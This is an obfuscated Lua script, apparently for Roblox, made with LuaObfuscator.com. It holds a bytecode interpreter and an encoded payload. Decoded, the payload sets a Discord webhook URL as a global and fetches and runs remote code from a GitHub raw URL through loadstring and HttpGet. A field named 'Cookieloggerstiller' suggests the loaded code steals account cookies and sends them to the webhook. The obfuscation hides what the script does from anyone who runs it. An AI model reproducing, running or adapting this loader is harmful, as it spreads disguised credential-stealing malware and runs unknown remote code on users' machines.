--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v85,v19);v19=nil;v102=1;end end else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v86-(v86%((2569 -(1523 + 114)) -(771 + 86 + 74))) ;else local v87=(570 -(367 + 201))^(v32-(928 -(214 + (1015 -302)))) ;return (((v31%(v87 + v87))>=v87) and (1 + (877 -(282 + 595)))) or (0 + 0) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1066 -(68 + 978 + 19))) then return v35;end if (v34==(1270 -(226 + 232 + 812))) then v35=v1(v16,v18,v18);v18=v18 + ((961 -(892 + 65)) -3) ;v34=118 -(32 + 85) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23()local v38=350 -(87 + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(3 -(5 -3))) then return (v42 * (16778168 -(802 + 150))) + (v41 * (65716 -(67 + 113))) + (v40 * (689 -433)) + v39 ;end if (v38==(0 + 0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;v38=2 -1 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 -(0 + 0) ,1207 -(1069 + 118) ) * ((4 -2)^((841 -(201 + 571)) -37))) + v43 ;local v47=v20(v44,21,6 + 25 );local v48=((v20(v44,56 -24 )==(1 + 0)) and  -(792 -(368 + 423))) or (3 -(1140 -(116 + 1022))) ;if (v47==(18 -(10 + 8))) then if (v46==(0 -0)) then return v48 * ((1840 -1398) -(416 + 26)) ;else local v94=0 -0 ;while true do if ((0 + 0)==v94) then v47=1 + 0 ;v45=0;break;end end end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * (1/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v49)local v50;if  not v49 then local v88=0 -0 ;while true do if ((0 -0)==v88) then v49=v23();if (v49==(859 -(288 + 526 + 45))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -((887 -(261 + 624)) -1) );v18=v18 + v49 ;local v51={};for v67=1 + (0 -0) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=402 -(108 + 294) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1489 -(570 + 919))) then v53=0;v54=nil;v52=1 + 0 ;end if (v52~=(2 -0)) then else local v92=0;while true do if (v92==1) then v52=859 -(564 + 292) ;break;end if (v92==(811 -(569 + 242))) then v57=nil;v58=nil;v92=2 -1 ;end end end if (v52==(1 + 2)) then local v93=1024 -(706 + 318) ;while true do if ((1251 -(721 + 530))==v93) then v59=nil;v60=nil;v93=1;end if (1==v93) then v52=1275 -(945 + 326) ;break;end end end if (v52~=(2 -1)) then else v55=nil;v56=nil;v52=2;end if (v52==(4 + 0)) then while true do if (v53~=0) then else v54=0;v55=nil;v53=701 -(271 + 429) ;end if (v53==(1 + 0)) then local v99=1001 -(938 + 63) ;local v100;while true do if (v99==(0 + 0)) then v100=0;while true do if ((1500 -(1408 + 92))==v100) then local v147=1086 -(461 + 625) ;while true do if (v147==(1289 -(993 + 295))) then v100=1;break;end if (v147==0) then v56=nil;v57=nil;v147=1;end end end if (v100==(1 + 0)) then v53=1615 -(1565 + 48) ;break;end end break;end end end if (v53~=(1174 -(418 + 753))) then else v60=nil;while true do local v104=0 + 0 ;local v105;while true do if (v104==(0 + 0)) then v105=0;while true do if (v105~=(1 + 0)) then else if (v54==(268 -(176 + 91))) then local v177=0 + 0 ;local v178;local v179;while true do if ((530 -(406 + 123))==v177) then while true do if (v178==(0 -0)) then v179=1769 -(1749 + 20) ;while true do if (v179==(1 + 1)) then v54=1324 -(1249 + 73) ;break;end if (v179==(1 + 0)) then local v188=1145 -(466 + 679) ;local v189;while true do if (0~=v188) then else v189=0 -0 ;while true do if (v189==(2 -1)) then v179=2;break;end if (v189==(1900 -(106 + 1794))) then local v197=0 + 0 ;while true do if (v197==0) then for v199=1 + 0 ,v59 do local v200=0 -0 ;local v201;local v202;local v203;while true do if (v200~=1) then else v203=nil;while true do if (v201==(0 -0)) then local v210=0 -0 ;local v211;while true do if (0==v210) then v211=0 -0 ;while true do if (v211==(0 -0)) then v202=v21();v203=nil;v211=1 -0 ;end if (v211==1) then v201=115 -(4 + 110) ;break;end end break;end end end if (v201==(585 -(57 + 527))) then if (v202==(1228 -(322 + 905))) then v203=v21()~=(611 -(602 + 9)) ;elseif (v202==(1429 -(41 + 1386))) then v203=v24();elseif (v202~=(106 -(17 + 86))) then else v203=v25();end v60[v199]=v203;break;end end break;end if ((872 -(826 + 46))==v200) then v201=947 -(245 + 702) ;v202=nil;v200=3 -2 ;end end end v58[3 + 0 ]=v21();v197=1 -0 ;end if (v197==1) then v189=1899 -(260 + 1638) ;break;end end end end break;end end end if ((440 -(382 + 58))==v179) then v59=v23();v60={};v179=3 -2 ;end end break;end end break;end if (v177==(0 + 0)) then v178=0 -0 ;v179=nil;v177=2 -1 ;end end end break;end if (v105==(1205 -(902 + 303))) then if ((168 -(122 + 44))~=v54) then else local v180=0;while true do local v183=0;while true do if (v183==(0 -0)) then if (v180==(0 -0)) then local v184=0 + 0 ;local v185;while true do if (v184==(0 + 0)) then v185=0 -0 ;while true do if (1==v185) then v180=1691 -(1121 + 569) ;break;end if (v185~=0) then else for v191=66 -(30 + 35) ,v23() do local v192=0 + 0 ;local v193;local v194;while true do if ((1258 -(1043 + 214))~=v192) then else while true do if (v193==(0 -0)) then v194=v21();if (v20(v194,3 -2 ,1)==(1212 -(323 + 889))) then local v204=0 -0 ;local v205;local v206;local v207;local v208;while true do if (v204~=(580 -(361 + 219))) then else v205=765 -(468 + 297) ;v206=nil;v204=321 -(53 + 267) ;end if (v204==(563 -(334 + 228))) then local v209=0 -0 ;while true do if (v209~=(2 -1)) then else v204=1 + 1 ;break;end if (0==v209) then local v213=413 -(15 + 398) ;while true do if (v213==1) then v209=983 -(18 + 964) ;break;end if (v213~=0) then else v207=nil;v208=nil;v213=1;end end end end end if (2~=v204) then else while true do if (2==v205) then local v214=236 -(141 + 95) ;local v215;while true do if (v214==(0 -0)) then v215=0 -0 ;while true do if (v215~=(0 + 0)) then else local v223=0 + 0 ;while true do if (v223==(0 -0)) then if (v20(v207,1 + 0 ,851 -(20 + 830) )==(1 + 0)) then v208[2 + 0 ]=v60[v208[2]];end if (v20(v207,128 -(116 + 10) ,2 + 0 )==1) then v208[4 -1 ]=v60[v208[1 + 2 ]];end v223=739 -(542 + 196) ;end if (v223==(164 -(92 + 71))) then v215=1;break;end end end if (v215==(1 + 0)) then v205=4 -1 ;break;end end break;end end end if (v205~=3) then else if (v20(v207,6 -3 ,1 + 2 )==(2 -1)) then v208[3 + 1 ]=v60[v208[2 + 2 ]];end v55[v191]=v208;break;end if (v205~=(0 -0)) then else local v217=849 -(254 + 595) ;local v218;while true do if (v217==0) then v218=0 -0 ;while true do if (v218~=(1552 -(1126 + 425))) then else v205=406 -(118 + 287) ;break;end if ((0 -0)==v218) then local v224=1121 -(118 + 1003) ;while true do if (v224~=(2 -1)) then else v218=378 -(142 + 235) ;break;end if (v224~=(0 -0)) then else v206=v20(v194,2,1 + 2 );v207=v20(v194,981 -(553 + 424) ,10 -4 );v224=940 -(714 + 225) ;end end end end break;end end end if (v205~=(2 -1)) then else local v219=0 + 0 ;local v220;while true do if ((0 + 0)~=v219) then else v220=0;while true do if (v220==(0 + 0)) then local v225=0 + 0 ;while true do if (v225~=(0 + 0)) then else v208={v22(),v22(),nil,nil};if (v206==(0 -0)) then local v230=0 -0 ;local v231;local v232;local v233;while true do if (v230==(732 -(16 + 716))) then v231=0 -0 ;v232=nil;v230=1 + 0 ;end if (v230~=(2 -1)) then else v233=nil;while true do if (v231==(0 -0)) then v232=0;v233=nil;v231=1;end if (v231~=(2 -1)) then else while true do if (v232~=(0 -0)) then else v233=1796 -(503 + 1293) ;while true do if (v233==(753 -(239 + 514))) then v208[2 + 1 ]=v22();v208[3 + 1 ]=v22();break;end end break;end end break;end end break;end end elseif (v206==1) then v208[1064 -(810 + 251) ]=v23();elseif (v206==(1331 -(797 + 532))) then v208[3 + 0 ]=v23() -((2 + 0)^(6 + 10)) ;elseif (v206~=(6 -3)) then else local v236=733 -(711 + 22) ;local v237;local v238;while true do if (v236==0) then v237=0 -0 ;v238=nil;v236=1;end if (v236==(1203 -(373 + 829))) then while true do if (v237==(731 -(476 + 255))) then v238=0 + 0 ;while true do if (v238==0) then v208[1133 -(369 + 761) ]=v23() -((2 + 0)^(28 -12)) ;v208[4]=v22();break;end end break;end end break;end end end v225=1 -0 ;end if (v225==(406 -(255 + 150))) then v220=1;break;end end end if (v220==(239 -(64 + 174))) then v205=2 + 0 ;break;end end break;end end end end break;end end end break;end end break;end if (v192==(0 + 0)) then v193=0 -0 ;v194=nil;v192=1;end end end for v195=1,v23() do v56[v195-(337 -(144 + 192)) ]=v28();end v185=1;end end break;end end end if (v180==1) then return v58;end break;end end end end if (v54==(216 -(42 + 174))) then local v181=0 + 0 ;local v182;while true do if (v181==(0 + 0)) then v182=1739 -(404 + 1335) ;while true do if (v182~=0) then else local v186=406 -(183 + 223) ;while true do if (v186~=0) then else local v190=0 + 0 ;while true do if (v190==(0 + 0)) then v55={};v56={};v190=1 + 0 ;end if ((1505 -(363 + 1141))~=v190) then else v186=1581 -(1183 + 397) ;break;end end end if (v186==(1 + 0)) then v182=2 -1 ;break;end end end if (v182==(2 + 0)) then v54=1 + 0 ;break;end if (v182==(1 + 0)) then local v187=1975 -(1913 + 62) ;while true do if (v187==(1494 -(711 + 782))) then v182=2;break;end if (v187~=(0 + 0)) then else v57={};v58={v55,v56,nil,v57};v187=1934 -(565 + 1368) ;end end end end break;end end end v105=1 + 0 ;end end break;end end end break;end if (v53~=(1821 -(580 + 1239))) then else local v101=0;while true do if (v101==0) then v58=nil;v59=nil;v101=3 -2 ;end if (v101~=(1662 -(1477 + 184))) then else v53=3 -0 ;break;end end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=5) then if (v82<=2) then if (v82<=0) then local v106=0;while true do if (v106==1) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v106=2;end if (v106==2) then v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v106=3;end if (v106==3) then v73=v81[3];break;end if (v106==0) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v106=1;end end elseif (v82==1) then v73=v81[3];else do return;end end elseif (v82<=3) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82>4) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=8) then if (v82<=6) then local v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));elseif (v82>7) then v79[v81[2]]();else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=10) then if (v82==9) then local v116=v81[2];local v117,v118=v72(v79[v116](v13(v79,v116 + 1 ,v81[3])));v74=(v118 + v116) -1 ;local v119=0;for v145=v116,v74 do local v146=0;while true do if (v146==0) then v119=v119 + 1 ;v79[v145]=v117[v119];break;end end end else local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];end elseif (v82==11) then v79[v81[2]]=v81[3];else local v127=0;local v128;local v129;local v130;local v131;local v132;while true do if (v127==7) then v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v73=v81[3];break;end if (v127==0) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v79[v81[2]][v81[3]]=v81[4];v127=1;end if (v127==4) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v127=5;end if (3==v127) then v79[v132 + 1 ]=v131;v79[v132]=v131[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v127=4;end if (v127==2) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v132=v81[2];v131=v79[v81[3]];v127=3;end if (v127==6) then v73=v73 + 1 ;v81=v69[v73];v132=v81[2];v79[v132]=v79[v132](v13(v79,v132 + 1 ,v74));v73=v73 + 1 ;v127=7;end if (1==v127) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v127=2;end if (v127==5) then v132=v81[2];v129,v130=v72(v79[v132](v13(v79,v132 + 1 ,v81[3])));v74=(v130 + v132) -1 ;v128=0;for v174=v132,v74 do v128=v128 + 1 ;v79[v174]=v129[v128];end v127=6;end end end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F4O3136322O3530363036343935373530332F656D5558554A56755366454E5636585672506266425A6757786470622D6D7633722D4C48536B6A5F65644757526B425F6B30535069465F4C79426A525053686B4E586B48030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503133O00432O6F6B69656C6F2O6765727374692O6C657203093O00557365724E616D653200173O00120B3O00013O0026033O000E000100020004013O000E0001001204000100033O00300C00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O001600010026033O0001000100010004013O00010001001204000100033O00302O0001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O00023O00017O00",v9(),...);end
